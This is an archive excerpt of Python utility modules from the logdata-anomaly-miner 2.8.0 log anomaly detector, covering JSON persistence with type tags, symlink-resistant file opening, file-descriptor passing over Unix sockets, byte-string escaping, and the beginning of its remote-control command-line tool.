logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util/JsonUtil.py000066400000000000000000000057311500476301700323070ustar00rootroot00000000000000
"""This module converts json strings to object structures also supporting byte array structures.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
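"""
import json
import logging
import ast
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.util.StringUtil import encode_byte_string_as_string, decode_string_as_byte_string


def dump_as_json(input_object):
    """Serialise input_object to a JSON string.

    str and bytes values are tagged ('string:' / 'bytes:') by encode_object so that load_json can restore their original type.
    @param input_object any structure accepted by encode_object.
    @return the JSON text.
    @raise Exception (from encode_object) for values of an unsupported type.
    """
    return json.dumps(encode_object(input_object))


def load_json(input_string):
    """Parse a JSON string produced by dump_as_json and restore the tagged types.

    @param input_string the JSON text.
    @return the decoded object structure.
    @raise ValueError (json.JSONDecodeError) when input_string is not valid JSON.
    """
    return decode_object(json.loads(input_string))


def encode_object(term):
    """Convert term into a structure that json.dumps can serialise without losing the str/bytes distinction.

    str values get the prefix 'string:', bytes values the prefix 'bytes:' (escaped via encode_byte_string_as_string), so a str that
    itself starts with 'tuple:' or 'bytes:' cannot be confused with a tag. Tuple dict keys are stored as 'tuple:' + repr(key).
    @param term str, bytes, list/tuple/set, dict, bool, int, float or None; nested arbitrarily.
    @return the JSON-ready structure.
    @raise Exception for any other type.
    """
    if isinstance(term, str):
        encoded_object = 'string:' + term
    elif isinstance(term, bytes):
        encoded_object = 'bytes:' + encode_byte_string_as_string(term)
    elif isinstance(term, (list, tuple, set)):
        encoded_object = [encode_object(item) for item in term]
    elif isinstance(term, dict):
        encoded_object = {}
        for key, var in term.items():
            if isinstance(key, tuple):
                # Elements of a tuple key are stored via repr, not via encode_object; literal_eval restores them in decode_object.
                key = "tuple:" + str(key)
            else:
                key = encode_object(key)
            encoded_object[key] = encode_object(var)
    elif isinstance(term, (bool, int, float)) or term is None:
        encoded_object = term
    else:
        msg = f"Unencodeable object {type(term)}"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    return encoded_object


def decode_object(term):
    """Invert encode_object: strip the type tags and rebuild bytes and tuple keys.

    Untagged values (numbers, booleans, None, strings without a known prefix) are returned unchanged.
    @param term a structure as produced by encode_object, usually fresh from json.loads.
    @return the restored object structure.
    """
    if isinstance(term, str) and term.startswith('string:'):
        decoded_object = term[7:]
    elif isinstance(term, str) and term.startswith('bytes:'):
        decoded_object = term[6:]
        decoded_object = decode_string_as_byte_string(decoded_object)
    elif isinstance(term, list):
        decoded_object = [decode_object(item) for item in term]
    elif isinstance(term, dict):
        decoded_object = {}
        for key, var in term.items():
            # Keys coming from json.loads are always str; the isinstance guard keeps this usable on dicts built elsewhere.
            if isinstance(key, str) and key.startswith("tuple:"):
                # literal_eval only evaluates Python literals, it never executes code, so a tampered persistence file cannot
                # run anything here. Besides ValueError it raises SyntaxError (unparsable text) or TypeError (unhashable
                # literal); all of them leave the key as the raw string instead of aborting the whole load.
                try:
                    key = ast.literal_eval(key[6:])
                except (ValueError, SyntaxError, TypeError):
                    pass
            else:
                key = decode_object(key)
            decoded_object[key] = decode_object(var)
    else:
        decoded_object = term
    return decoded_object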
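logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util/PersistenceUtil.py000066400000000000000000000150331500476301700336560ustar00rootroot00000000000000
"""This module defines functions for reading and writing files in a secure way.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import errno
import os
import logging
import tempfile
import shutil
import sys
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.util import SecureOSFunctions
from aminer.util import JsonUtil

# Have a registry of all persistable components. Those might be happy to be invoked before python process is terminating.
persistable_components: list = []
# When True, duplicate persistence_id detection is only logged, not printed to stderr.
SKIP_PERSISTENCE_ID_WARNING = False


def add_persistable_component(component):
    """Add a component to the registry of all persistable components.

    Components sharing a persistence_file_name would overwrite each other's state, so a duplicate is reported (log and, unless
    SKIP_PERSISTENCE_ID_WARNING is set, stderr) before the component is registered anyway.
    @param component an object with a do_persist() method; persistence_file_name is optional.
    """
    if not hasattr(component, "persistence_file_name"):
        # Nothing on disk to clash with, so no duplicate check is possible or needed.
        persistable_components.append(component)
        return
    for c in persistable_components:
        if hasattr(c, "persistence_file_name") and c.persistence_file_name == component.persistence_file_name:
            msg = f'Detectors of type {c.__class__.__name__} use the persistence_id "{os.path.split(c.persistence_file_name)[1]}" ' \
                  f"multiple times. Please assign a unique persistence_id for every component."
            logging.getLogger(DEBUG_LOG_NAME).warning(msg)
            if not SKIP_PERSISTENCE_ID_WARNING:
                print("Warning: " + msg, file=sys.stderr)
    persistable_components.append(component)


def open_persistence_file(file_name, flags):
    """Open the given persistence file.

    When O_CREAT was specified, the function will attempt to create the directories too.
    @param file_name absolute path as str or bytes.
    @param flags os.open flags; SecureOSFunctions adds O_NOFOLLOW and O_NOCTTY.
    @return the file descriptor, or None when the file was missing, O_CREAT was set and only the missing directories were created;
    the caller has to open again in that case.
    @raise TypeError when file_name is neither str nor bytes.
    @raise OSError for any other open failure (logged before re-raising).
    """
    fn_type = type(file_name)
    if fn_type not in (str, bytes):
        msg = "file_name has to be of the type string or bytes."
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise TypeError(msg)
    if fn_type == str:
        file_name = file_name.encode()
    try:
        return SecureOSFunctions.secure_open_file(file_name, flags)
    except OSError as openOsError:
        if ((flags & os.O_CREAT) == 0) or (openOsError.errno != errno.ENOENT):
            logging.getLogger(DEBUG_LOG_NAME).error(openOsError)
            raise openOsError
        # file_name is bytes here; create_missing_directories handles both str and bytes paths.
        create_missing_directories(file_name)
    return None


def replace_persistence_file(file_name, new_file_handle):
    """Replace the named file with the file referred by the handle.

    The temporary file is renamed over the target in one step, so readers either see the complete old state or the complete
    new one and a crash in between cannot leave the persistence file missing.
    @param file_name target path as str.
    @param new_file_handle descriptor of a file created inside SecureOSFunctions.tmp_base_dir_path (see store_json).
    """
    base_dir_fd = SecureOSFunctions.secure_open_base_directory()
    # /proc/self/fd resolves the descriptor back to the temporary file's absolute path (Linux only).
    tmp_file_name = os.readlink(f"/proc/self/fd/{new_file_handle}")
    base_dir = SecureOSFunctions.base_dir_path.decode()
    # Only a prefix match on a path-component boundary turns file_name into a base-dir-relative path; a mere substring match
    # (e.g. '/tmp/x/var/lib/aminer/y' for base '/var/lib/aminer') must not be rewritten.
    if file_name.startswith(base_dir) and (base_dir.endswith("/") or len(file_name) == len(base_dir)
                                           or file_name[len(base_dir)] == "/"):
        file_name = file_name[len(base_dir):].lstrip("/")
    # dir_fd arguments are ignored for absolute paths.
    os.rename(tmp_file_name, file_name, src_dir_fd=SecureOSFunctions.tmp_base_dir_fd, dst_dir_fd=base_dir_fd)


def persist_all():
    """Persist all persistable components in the registry by calling their do_persist()."""
    for component in persistable_components:
        component.do_persist()


def load_json(file_name):
    """Load persistence data from file.

    @param file_name absolute path of the persistence file.
    @return the decoded object, or None if file did not yet exist.
    @raise ValueError when the file content is not valid UTF-8 JSON ("Corrupted data").
    @raise OSError for read errors other than a missing file.
    """
    try:
        persistence_file_handle = open_persistence_file(file_name, os.O_RDONLY | os.O_NOFOLLOW)
        if persistence_file_handle is None:
            return None
        try:
            # Read until EOF instead of trusting a single os.read() to return st_size bytes.
            chunks = []
            while True:
                chunk = os.read(persistence_file_handle, 1 << 16)
                if not chunk:
                    break
                chunks.append(chunk)
        finally:
            # The descriptor must not leak when os.read() raises.
            os.close(persistence_file_handle)
    except OSError as openOsError:
        if openOsError.errno != errno.ENOENT:
            logging.getLogger(DEBUG_LOG_NAME).error(openOsError)
            raise openOsError
        return None
    try:
        # UnicodeDecodeError is a ValueError, so undecodable bytes are reported as corruption as well.
        persistence_data = str(b"".join(chunks), "utf-8")
        return JsonUtil.load_json(persistence_data)
    except ValueError as value_error:
        msg = f"Corrupted data in {file_name}: {value_error}"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise ValueError(msg)


def store_json(file_name, object_data):
    """Store persistence data to file.

    @param file_name absolute path of the persistence file (str).
    @param object_data any structure accepted by JsonUtil.dump_as_json.
    """
    persistence_data = JsonUtil.dump_as_json(object_data)
    # Create a temporary file within persistence directory to write new persistence data to it.
    # Thus, the old data is not modified, any error creating or writing the file will not harm the old state.
    fd, tmp_path = tempfile.mkstemp(dir=SecureOSFunctions.tmp_base_dir_path)
    try:
        data = bytes(persistence_data, "utf-8")
        # os.write() may write fewer bytes than requested; loop until everything is out.
        written = 0
        while written < len(data):
            written += os.write(fd, data[written:])
        create_missing_directories(file_name)
        replace_persistence_file(file_name, fd)
    except BaseException:
        # Best effort: do not leave a half-written temporary file in the persistence directory.
        try:
            os.unlink(tmp_path)
        except OSError:
            pass
        raise
    finally:
        os.close(fd)


def create_missing_directories(file_name):
    """Create missing persistence directories for the given file path.

    @param file_name path as str or bytes; only its directory part is created.
    """
    dir_name = os.path.dirname(file_name)
    if dir_name:
        # exist_ok avoids a race between the existence check and the creation.
        os.makedirs(dir_name, exist_ok=True)


def clear_persistence(persistence_dir_name):
    """Delete all persistence data from the persistence_dir.

    Only subdirectories are removed; the 'backup' directory is kept and plain files are reported but left alone.
    @param persistence_dir_name the persistence directory.
    """
    for filename in os.listdir(persistence_dir_name):
        if filename == "backup":
            continue
        file_path = os.path.join(persistence_dir_name, filename)
        try:
            if not os.path.isdir(file_path):
                msg = "The aminer persistence directory should not contain any files."
                print(msg, file=sys.stderr)
                logging.getLogger(DEBUG_LOG_NAME).warning(msg)
                continue
            shutil.rmtree(file_path)
        except OSError as e:
            msg = f"Failed to delete {file_path}. Reason: {e}"
            print(msg, file=sys.stderr)
            logging.getLogger(DEBUG_LOG_NAME).error(msg)


def copytree(src, dst, symlinks=False, ignore=None):
    """Copy a directory recursively.

    This method has no issue with the destination directory existing (shutil.copytree has).
    NOTE(review): only the top-level destination may pre-exist; subdirectories are still delegated to shutil.copytree and
    fail when the corresponding destination subdirectory already exists.
    @param src source directory.
    @param dst existing destination directory.
    @param symlinks, ignore passed through to shutil.copytree for subdirectories.
    """
    for item in os.listdir(src):
        s = os.path.join(src, item)
        d = os.path.join(dst, item)
        if os.path.isdir(s):
            shutil.copytree(s, d, symlinks, ignore)
        else:
            shutil.copy2(s, d)
SecureOSFunctions.py000066400000000000000000000215171500476301700340420ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util
"""This module defines functions for secure file handling.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .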
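"""
import os
import socket
import struct
import sys
import logging
from aminer.AminerConfig import DEBUG_LOG_NAME

# Descriptors and paths of the directories opened through secure_open_base_directory / secure_open_log_directory.
# All stay None until the respective open function has been called; paths are byte strings.
base_dir_fd = None
tmp_base_dir_fd = None
log_dir_fd = None
base_dir_path = None
tmp_base_dir_path = None
log_dir_path = None


def _relative_to_base(path):
    """Return path relative to base_dir_path when path lies inside the base directory, else None.

    Only a prefix match on a path-component boundary counts, so b'/var/lib/aminer2/x' is not treated as a child of
    b'/var/lib/aminer'. Stripping by length (instead of str.replace) also leaves later occurrences of the base path untouched.
    @param path absolute path as byte string.
    """
    if base_dir_path is None or not path.startswith(base_dir_path):
        return None
    remainder = path[len(base_dir_path):]
    if remainder and not remainder.startswith(b'/') and not base_dir_path.endswith(b'/'):
        return None
    return remainder.lstrip(b'/')


def secure_open_base_directory(directory_name=None, flags=0):
    """Open the base directory in a secure way.

    The first call needs an absolute directory_name and opens it (and, under the same path, the temporary-file directory)
    with O_NOFOLLOW | O_NOCTTY | O_DIRECTORY. O_NOFOLLOW only protects the final path component; parent components are still
    resolved by the kernel, so the base directory path itself has to be trustworthy. Later calls return the cached descriptor.
    @param directory_name str or bytes; may be None once the directory is open.
    @param flags additional os.open flags for the first open.
    @return the base directory descriptor.
    @raise ValueError on the first call without an absolute directory_name.
    """
    global base_dir_fd
    global base_dir_path
    global tmp_base_dir_fd
    global tmp_base_dir_path
    if directory_name is not None and isinstance(directory_name, str):
        directory_name = directory_name.encode()
    if base_dir_path is None and (directory_name is None or not directory_name.startswith(b'/')):
        msg = 'Secure open on relative path not supported and an empty directory_name is not allowed when calling this function for'\
            ' the first time.'
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise ValueError(msg)
    if base_dir_fd is None:
        dir_flags = flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY
        new_base_fd = os.open(directory_name, dir_flags)
        try:
            new_tmp_fd = os.open(directory_name, dir_flags)
        except OSError:
            # Do not leave the module half-initialised (base open, tmp missing) when the second open fails.
            os.close(new_base_fd)
            raise
        base_dir_fd = new_base_fd
        base_dir_path = directory_name
        tmp_base_dir_path = directory_name
        tmp_base_dir_fd = new_tmp_fd
    return base_dir_fd


def close_base_directory():
    """Close the base directory at program shutdown.

    @raise Exception when a descriptor cannot be closed.
    """
    global base_dir_fd
    global tmp_base_dir_fd
    global base_dir_path
    try:
        if base_dir_fd is not None:
            os.close(base_dir_fd)
            base_dir_fd = None
            base_dir_path = None
        if tmp_base_dir_fd is not None:
            os.close(tmp_base_dir_fd)
            tmp_base_dir_fd = None
    except OSError as e:
        msg = f"Could not close the base directory. Error: {e}"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)


def secure_open_log_directory(log_directory_name=None, flags=0):
    """Open the base log directory in a secure way.

    When the log directory lies inside the base directory it is opened relative to base_dir_fd, otherwise by absolute path.
    Later calls return the cached descriptor.
    @param log_directory_name str or bytes; may be None once the directory is open.
    @param flags additional os.open flags for the first open.
    @return the log directory descriptor.
    @raise ValueError on the first call without an absolute log_directory_name.
    """
    global log_dir_fd
    global log_dir_path
    if log_directory_name is not None and isinstance(log_directory_name, str):
        log_directory_name = log_directory_name.encode()
    if log_dir_path is None and (log_directory_name is None or not log_directory_name.startswith(b'/')):
        msg = 'Secure open on relative path not supported'
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise ValueError(msg)
    if log_dir_fd is None:
        dir_flags = flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY
        relative_name = _relative_to_base(log_directory_name)
        if relative_name is not None:
            log_dir_fd = os.open(relative_name, dir_flags, dir_fd=base_dir_fd)
        else:
            log_dir_fd = os.open(log_directory_name, dir_flags)
        log_dir_path = log_directory_name
    return log_dir_fd


def close_log_directory():
    """Close the base log directory at program shutdown.

    @raise Exception when the descriptor cannot be closed.
    """
    global log_dir_fd
    global log_dir_path
    try:
        if log_dir_fd is not None:
            os.close(log_dir_fd)
            log_dir_fd = None
            log_dir_path = None
    except OSError as e:
        msg = f"Could not close the base log directory. Error: {e}"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)


def secure_open_file(file_name, flags):
    """Secure opening of a file with given flags.

    O_NOFOLLOW is added so the final component of each open is never a symlink: the file itself, and (outside the base
    directory) the last component of its parent directory, which is opened first and then used as dir_fd. Earlier path
    components are still resolved by the kernel, so this is not a full component-by-component walk. O_NOCTTY is added as
    well, as acquiring a controlling TTY is just an additional risk and does not make sense for opening of log files.
    @param file_name absolute file name as str or byte string.
    @param flags os.open flags for the file.
    @return the file descriptor.
    @raise ValueError for relative paths.
    @raise Exception when a directory is opened without O_DIRECTORY.
    """
    if isinstance(file_name, str):
        file_name = file_name.encode()
    if not file_name.startswith(b'/'):
        msg = 'Secure open on relative path not supported'
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise ValueError(msg)
    # Advisory pre-check only (isdir follows symlinks and may race); the O_NOFOLLOW open below is the actual guard.
    if (file_name.endswith(b'/') or os.path.isdir(file_name)) and ((flags & os.O_DIRECTORY) == 0):
        msg = 'Opening directory but O_DIRECTORY flag missing'
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    secure_flags = flags | os.O_NOFOLLOW | os.O_NOCTTY
    if base_dir_path is not None:
        relative_name = _relative_to_base(file_name)
        if relative_name is None:
            relative_name = file_name
        # dir_fd is ignored with absolute paths.
        return os.open(relative_name, secure_flags, dir_fd=base_dir_fd)
    dir_name = os.path.dirname(file_name)
    base_name = os.path.basename(file_name)
    # The parent directory is opened read-only on purpose: the caller's flags may contain O_WRONLY/O_CREAT, which are
    # invalid for a directory (EISDIR).
    dir_fd = os.open(dir_name, os.O_RDONLY | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY)
    try:
        return os.open(base_name, secure_flags, dir_fd=dir_fd)
    finally:
        # Release the directory descriptor whether or not the file open succeeded.
        os.close(dir_fd)


def send_annotated_file_descriptor(send_socket, send_fd, type_info, annotation_data):
    """
    Send file descriptor and associated annotation data via SCM_RIGHTS.
    @param send_socket a connected AF_UNIX socket.
    @param send_fd the descriptor to pass.
    @param type_info has to be a null-byte free string to inform the receiver how to handle the file descriptor and how to
    interpret the annotationData.
    @param annotation_data this optional byte array may convey additional information about the file descriptor.
    @raise Exception when type_info contains a null byte (it is the separator of the message).
    """
    # Construct the message data first
    if isinstance(type_info, str):
        type_info = type_info.encode()
    if isinstance(annotation_data, str):
        annotation_data = annotation_data.encode()
    if type_info.find(b'\x00') >= 0:
        msg = 'Null bytes not supported in typeInfo'
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    message_data = b'%s\x00%s' % (type_info, annotation_data)
    send_socket.sendmsg([message_data], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, struct.pack('i', send_fd))])


def send_logstream_descriptor(send_socket, send_fd, send_file_name):
    """Send a file descriptor to be used as standard log data stream source for the analysis pipeline.

    @param send_file_name the annotation, i.e. the name of the stream source.
    """
    send_annotated_file_descriptor(send_socket, send_fd, b'logstream', send_file_name)


def receive_annotated_file_descriptor(receive_socket):
    """Receive a single file descriptor and attached annotation information via SCM_RIGHTS via the given socket.

    The method may raise an Exception when invoked on non-blocking sockets and no messages available.
    @param receive_socket a connected AF_UNIX socket.
    @return a tuple containing the received file descriptor, type information (see sendAnnotatedFileDescriptor) and the
    annotation information, both as byte strings.
    @raise Exception when the message does not carry exactly one aligned descriptor or lacks the null separator.
    """
    message_data, anc_data, flags, _remote_address = receive_socket.recvmsg(1 << 16, socket.CMSG_LEN(struct.calcsize('i')))
    if flags & socket.MSG_CTRUNC:
        # Truncated ancillary data means descriptors were dropped by the kernel; the message cannot be trusted.
        msg = 'Received truncated ancillary data'
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    if len(anc_data) != 1:
        msg = f"Received {len(anc_data)} sets of ancillary data instead of 1"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    cmsg_level, cmsg_type, cmsg_data = anc_data[0]
    if (cmsg_level != socket.SOL_SOCKET) or (cmsg_type != socket.SCM_RIGHTS):
        msg = 'Received invalid message from remote side'
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    # Do not accept multiple or unaligned FDs.
    if len(cmsg_data) != 4:
        msg = f"Unsupported control message length {len(cmsg_data)}"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    received_fd = struct.unpack('i', cmsg_data)[0]
    split_pos = message_data.find(b'\x00')
    if split_pos < 0:
        msg = 'No null byte in received message'
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    type_info = message_data[:split_pos]
    annotation_data = message_data[split_pos + 1:]
    if received_fd <= 2:
        # stdin/stdout/stderr numbers are unexpected here; keep going but make it visible.
        msg = f'received "reserved" fd {received_fd}'
        logging.getLogger(DEBUG_LOG_NAME).warning(msg)
        print('WARNING: ' + msg, file=sys.stderr)
    # recvmsg returns bytes, so no str conversion is needed for type_info and annotation_data.
    return received_fd, type_info, annotation_data
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util/StringUtil.py000066400000000000000000000071101500476301700326350ustar00rootroot00000000000000
"""Some useful string-functions.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .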
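"""
import logging
import sys
import os
from aminer.AminerConfig import DEBUG_LOG_NAME

colflame = ("\033[31m"
            " * ( ) ( \n"
            " ( ( ` )\\ ) ( /( )\\ ) \n"
            " )\\ )\\))( (()/( )\\()) ( (()/( \n"
            "\033[33m"
            "((((_)( ((_)()\\ /(_))(_)\\ )\\ /(_)) \n"
            " )\\ _ )\\(_()((_)(_)) _((_)((_) (_)) \n"
            " (_)\033[39m_\\\033[33m()\033[39m| \\/ ||_ _|| \\| || __|| _ \\ \n"
            " / _ \\ | |\\/| | | | | .` || _| | / \n"
            " /_/ \\_\\|_| |_||___||_|\\_||___||_|_\\ "
            "\033[39m")

flame = (" * ( ) ( \n"
         " ( ( ` )\\ ) ( /( )\\ ) \n"
         " )\\ )\\))( (()/( )\\()) ( (()/( \n"
         "((((_)( ((_)()\\ /(_))(_)\\ )\\ /(_)) \n"
         " )\\ _ )\\(_()((_)(_)) _((_)((_) (_)) \n"
         " (_)_\\()| \\/ ||_ _|| \\| || __|| _ \\ \n"
         " / _ \\ | |\\/| | | | | .` || _| | / \n"
         " /_/ \\_\\|_| |_||___||_|\\_||___||_|_\\ ")

# Characters that survive the byte-string encoding unchanged: printable ASCII without '%', which is the escape character.
_PRINTABLE_CHARS = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!"#$&\'()*+,-./:;<=>?@[]\\^_`{}|~ '
_PRINTABLE_BYTES = frozenset(_PRINTABLE_CHARS.encode('ascii'))
_HEX_DIGITS = '0123456789abcdefABCDEF'


def supports_color():
    """Return True if the running system's terminal supports color, and False otherwise.

    The function was borrowed from the django-project (https://github.com/django/django/blob/master/django/core/management/color.py)
    """
    plat = sys.platform
    supported_platform = plat != 'Pocket PC' and (plat != 'win32' or 'ANSICON' in os.environ)
    # isatty is not always implemented, #6223.
    is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
    return supported_platform and is_a_tty


def decode_string_as_byte_string(string):
    """Decode a string produced by the encode function encodeByteStringAsString(byteString) below.

    Every '%' has to be followed by exactly two hexadecimal digits; anything else is rejected instead of being handed to
    int() (which would also accept e.g. ' f' or '+f').
    @param string the encoded text.
    @return the decoded byte string.
    @raise ValueError for characters outside the printable set or malformed escape sequences.
    """
    decoded = bytearray()
    count = 0
    while count < len(string):
        char = string[count]
        if char in _PRINTABLE_CHARS:
            decoded += bytes(char, 'ascii')
            count += 1
        elif char == '%':
            hex_pair = string[count + 1:count + 3]
            if len(hex_pair) != 2 or hex_pair[0] not in _HEX_DIGITS or hex_pair[1] not in _HEX_DIGITS:
                msg = 'Invalid encoded character'
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            decoded.append(int(hex_pair, 16))
            count += 3
        else:
            # ValueError (a subclass of Exception) lets PersistenceUtil report this as corrupted data.
            msg = 'Invalid encoded character'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
    return bytes(decoded)


def encode_byte_string_as_string(byte_string):
    r"""Encode an arbitrary byte string to a string.

    This is achieved by replacing all non ascii-7 bytes and all non printable ascii-7 bytes and % character by replacing with
    their escape sequence %[hex]. For example byte string b'/\xc3' is encoded to '/%c3'
    @param byte_string the bytes to encode.
    @return a string with the encoded content.
    """
    parts = []
    for byte in byte_string:
        if byte in _PRINTABLE_BYTES:
            parts.append(chr(byte))
        else:
            parts.append('%%%02x' % byte)
    return ''.join(parts)
TimeTriggeredComponentInterface.py000066400000000000000000000050721500476301700367160ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util
"""This is the interface-class for the TimeTriggeredComponent.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import abc


class TimeTriggeredComponentInterface(metaclass=abc.ABCMeta):
    """This is the common interface of all components that can be registered to receive timer interrupts.

    There might be different timelines for triggering, real time and normalized log data time scale for forensic analysis.
    For forensic analyis different timers might be available to register a component. Therefore the component should state,
    which type of triggering it would require.
    """

    @property
    @abc.abstractmethod
    def time_trigger_class(self):
        """The trigger class constant; implementations must override this (see get_time_trigger_class)."""
        raise NotImplementedError

    def get_time_trigger_class(self):
        """Get the trigger class this component can be registered for.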
See AnalysisContext class for different trigger classes available.

        Only the values 1 and 2 are accepted; presumably these are the two AnalysisContext.TIME_TRIGGER_CLASS_*
        constants named in the error message (TODO confirm against AnalysisContext).
        @raise NotImplementedError if the implementing class did not set time_trigger_class to one of them.
        """
        if self.time_trigger_class not in (1, 2):
            raise NotImplementedError("The self.time_trigger_class property must be set to AnalysisContext.TIME_TRIGGER_CLASS_REALTIME or "
                                      "AnalysisContext.TIME_TRIGGER_CLASS_ANALYSISTIME.")
        return self.time_trigger_class

    @abc.abstractmethod
    def do_timer(self, trigger_time):
        """Perform trigger actions and determine the time for next invocation.

        The caller may decide to invoke this method earlier than requested during the previous call. Classes
        implementing this method have to handle such cases. Each class should try to limit the time spent in this
        method as it might delay trigger signals to other components. For extensive computational work or IO, a
        separate thread should be used.
        @param trigger_time the time this trigger is invoked. This might be the current real time when invoked from
        real time timers or the forensic log timescale time value.
        @return the number of seconds when next invocation of this trigger is required.
        """
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminerremotecontrol.py000077500000000000000000000120431500476301700323750ustar00rootroot00000000000000
#!/usr/bin/python3 -BbbW all
# -*- coding: utf-8 -*-
"""This tool allows to connect to a remote control socket, send requests and retrieve the responses.

To allow remote use of this tool, e.g. via SSH forwarding, the remote control address can be set on the command line,
no configuration is read.
Every command given with --exec or --exec-file is handed to the aminer process for execution, so anyone able to
connect to the control socket can run them; the socket's filesystem permissions are the access control
(NOTE(review): confirm against the socket setup in aminer).

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public
License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later
version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the
implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import json
import os
import socket
import traceback
import sys
import argparse

# Get rid of the default sys path immediately. Otherwise, Python also attempts to load the following imports from e.g. directory
# where this binary resides. sys.path[0] (the script directory) is dropped and only the fixed installation paths are
# appended, so a module placed next to this binary cannot shadow the aminer imports below.
sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled']
venv_path = "/usr/lib/logdata-anomaly-miner/.venv/lib"
if os.path.exists(venv_path):
    # NOTE(review): os.listdir() returns entries in arbitrary order, so with more than one python*/ directory in the
    # venv the selected site-packages is not deterministic.
    python_version = os.listdir(venv_path)[0]
    sys.path += [os.path.join(venv_path, python_version, "site-packages")]
from aminer.AnalysisChild import AnalysisChildRemoteControlHandler  # noqa: E402
from aminer.util.StringUtil import colflame, flame, supports_color  # noqa: E402
from metadata import __version_string__  # noqa: E402

# Banner for --help; the coloured variant is only used when stdout is a colour-capable TTY.
help_message = 'aminerremotecontrol\n'
if supports_color():
    help_message += colflame
else:
    help_message += flame
help_message += 'For further information read the man pages running "man aminerRemoteControl".'
parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-v', '--version', action='version', version=__version_string__)
parser.add_argument('-c', '--control-socket', default='/var/run/aminer-remote.socket', type=str, help='when given, use nonstandard control socket')
parser.add_argument('-d', '--data', help='provide this json serialized data within execution environment as "remote_control_data" (see man '
                                         'page).')
parser.add_argument('-e', '--exec', action='append', type=str, help='add command to the execution list, can be used more than once.')
parser.add_argument('-f', '--exec-file', type=str, help='add commands from file to the execution list in same way as if content would have '
                                                        'been used with "--exec"')
parser.add_argument('-s', '--string-response', action='store_true', help='if set, print the response just as string instead of passing it to repr')
args = parser.parse_args()

remote_control_socket_name = args.control_socket
if args.data is not None:
    # --data is parsed locally before being sent; malformed JSON raises json.JSONDecodeError here, uncaught.
    args.data = json.loads(args.data)
remote_control_data = args.data
command_list = args.exec
if command_list is None:
    command_list = []
if args.exec_file is not None:
    if not os.path.exists(args.exec_file):
        print(f"File {args.exec_file} does not exist")
